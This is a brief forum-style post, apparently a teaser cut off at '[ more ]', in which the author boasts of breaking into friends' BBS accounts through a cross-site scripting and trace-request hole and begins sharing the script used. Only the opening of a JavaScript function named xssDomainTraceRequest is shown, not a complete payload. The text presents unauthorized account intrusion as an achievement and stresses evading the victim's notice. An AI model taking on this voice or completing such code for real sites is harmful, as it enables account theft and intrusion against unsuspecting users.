It's really a terrible security hole. Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

var exampleCode = "var xmlHttp = new...

[ more ]